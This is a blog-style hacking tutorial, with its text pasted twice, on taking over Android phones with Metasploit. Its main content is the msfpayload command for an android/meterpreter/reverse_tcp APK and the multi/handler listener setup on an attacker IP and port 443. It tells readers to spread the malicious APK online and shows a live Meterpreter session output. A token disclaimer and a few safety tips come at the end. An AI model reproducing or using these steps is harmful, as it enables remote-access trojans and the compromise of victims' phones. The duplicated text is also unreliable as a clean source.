ANDROID HACKING WITH MSF
Hacking Android Smartphone using Metasploit
(Android application package file (APK) is the file format used to distribute and install application software onto Android operating system).
Requirements:
1. Metasploit framework
2. Android smartphone
{we are using kali in this tutorial, other distros like backbox and parrot maybe used}
WE START BY;
1. Open terminal (CTRL + ALT + T) .
2. We will utilize Metasploit payload framework to create exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.
Info:
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.
Info:
set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution ).
6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:
msf exploit (handler) >exploit
[*] Started reverse handler on 192.168.8.94:443
[*] Starting the payload handler...
[*] Sending stage (39698) to 192.168.8.89
[*] Meterpreter session 1 opened (192.168.8.94:443
6-7-1 17: 17:08:10 -0540
meterpreter
7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone
Notes;
For additional steps and tutorial on how to control our the hacked android phone, please leave a comment below, i will only post them upon getting 100views or shares or likes, or see this and more hacking tutorials from our collection of hacking books.
Disclaimer;
Any information provided in through this articles, tutorials and books is for information purposes only, any misuse will land you behind bars and we are not responsible for any illegal mishapps due to this information.
Remember;
Never install applications from unknown sources unless you have reviewed the source code of the app, and do not enable unknown sources in settings unless you intent to use the function.
PRECAUTIONS
Do not enable bluetooth and flasshare when you dont intend to use it and do not leave any of them on without purpose as they leave your phone viable to hacking.
Do not connect to free wifi hotspots, most of them are hackng hotspots to...
Do not forget to leave a comment and share, more tutorials are found in our books and daily posts. promote us by buying one of our cheap books.email us for more info.
#RAIDER***
(Android application package file (APK) is the file format used to distribute and install application software onto Android operating system).
Requirements:
1. Metasploit framework
2. Android smartphone
{we are using kali in this tutorial, other distros like backbox and parrot maybe used}
WE START BY;
1. Open terminal (CTRL + ALT + T) .
2. We will utilize Metasploit payload framework to create exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.
Info:
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.
Info:
set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution ).
6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:
msf exploit (handler) >exploit
[*] Started reverse handler on 192.168.8.94:443
[*] Starting the payload handler...
[*] Sending stage (39698) to 192.168.8.89
[*] Meterpreter session 1 opened (192.168.8.94:443
6-7-1 17: 17:08:10 -0540
meterpreter
7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone
Notes;
For additional steps and tutorial on how to control our the hacked android phone, please leave a comment below, i will only post them upon getting 100views or shares or likes, or see this and more hacking tutorials from our collection of hacking books.
Disclaimer;
Any information provided in through this articles, tutorials and books is for information purposes only, any misuse will land you behind bars and we are not responsible for any illegal mishapps due to this information.
Remember;
Never install applications from unknown sources unless you have reviewed the source code of the app, and do not enable unknown sources in settings unless you intent to use the function.
PRECAUTIONS
Do not enable bluetooth and flasshare when you dont intend to use it and do not leave any of them on without purpose as they leave your phone viable to hacking.
Do not connect to free wifi hotspots, most of them are hackng hotspots to...
Do not forget to leave a comment and share, more tutorials are found in our books and daily posts. promote us by buying one of our cheap books.email us for more info.
Post a Comment